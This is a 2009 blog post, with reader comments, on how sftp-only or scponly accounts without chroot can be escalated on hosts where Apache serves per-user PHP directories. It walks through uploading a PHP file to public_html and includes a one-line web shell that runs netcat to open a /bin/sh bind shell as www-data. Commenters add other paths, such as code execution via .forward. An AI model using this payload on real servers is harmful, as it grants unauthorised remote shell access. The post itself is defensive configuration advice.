security of scponly/sftp-server in combination with apache

Posted by Nico Golde in
Friday, August 14. 2009

While I am not a fan of scponly/sftp-server (openssh) many people are still using it to give users the possibility to up/download files from the host without the need to provide them with shell access. If you do a simple setup like http://www.debian-administration.org/articles/94 or configure scponly without using a chrooted environment and you do this on host that also has a standard webserver setup (apache serving per-user home directories and php) you already lost.

The user won't be able to login with the username you gave him but he can remotely login via your webserver now. All that needs to be done is:

Connect to the host using sftp

$ mkdir public_html

$ cd public_html; put index.php; chmod 644 index.php

point your browser to http://host/~user/

connect netcat to host:someport

index.php would just contain something like <? system("nc -lp someport -e /bin/sh"); ?> and you end up with a shell as www-data (on Debian).

It's pretty easy to make errors or miss important things in such a setup and I think it's almost always a better solution to either trust people and give them access via ssh or give them no access at all.

Comments (10) - Trackbacks (0)

Defined tags for this entry: config, debian, scponly, security, setup, sftp, software, ssh

Related entries by tags:

Trackbacks

Trackback specific URI for this entry

No Trackbacks

Comments

Display comments as (Linear | Threaded)

Lack of proper HTML escaping caused (apropos to a post about easily making errors) ate your example problematic PHP.

#1 James Vega on 2009-08-14 04:01 (Reply)

thanks didn't notice this!

#1.1 nion on 2009-08-14 13:38 (Reply)

Im using sftp with chroot and it works pretty good
http://www.debian-administration.org/articles/590
If you have a lot of users you cant trust everyone

#2 kero (Homepage) on 2009-08-14 10:56 (Reply)

You do not need apache and php. Most system have a MTA installed. And most MTAs by default allow some things in .forward that makes only allowing sftp a bit mood.

#3 Bernhard R. Link on 2009-08-14 11:31 (Reply)

you can execute code via .forward?

#3.1 nion on 2009-08-14 13:40 (Reply)

ok got it

#3.1.1 nion on 2009-08-15 14:05 (Reply)

At least with mod_suexec you can ensure that their shell will run as them, and not as www-data.

#4 Sam Morris (Homepage) on 2009-08-14 11:57 (Reply)

well sure, that's why I wrote "standard setup". This is also just a dirty workaround, what if the webserver serves cgis? I think instead of this everyone would probably just chroot this.

#4.1 nion on 2009-08-14 13:40 (Reply)

Hmm.. firewall? At a minimum on a production server, you should probably be dropping packets not on expected ports.. doesn't fix much, but it'll rule out nc as an attack vector.

Of course, if they can system() arbitrary commands, lack of a shell will hardly prevent a malicious user from causing mischief..

#5 matt on 2009-08-16 00:48 (Reply)

that limits the nc vector, still you can also setup a connect back shell.... of course there is always a way to prevent that, this post is just to point out one thing you have to think of when setting this up, nothing more...

#5.1 nion on 2009-08-16 15:12 (Reply)

Add Comment

Name
Email
Homepage
In reply to
Comment	Enclosing asterisks marks text as bold (word), underscore are made via _word_. Standard emoticons like :-) and ;-) are converted to images. You can use [geshi lang=lang_name [,ln={y\|n}]][/geshi] tags to embed source code snippets. E-Mail addresses will not be displayed and will only be used for E-Mail notifications. To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly. Enter the string from the spam-prevention image above: You can use [geshi lang=lang_name [,ln={y\|n}]][/geshi] tags to embed source code snippets.
	Remember Information?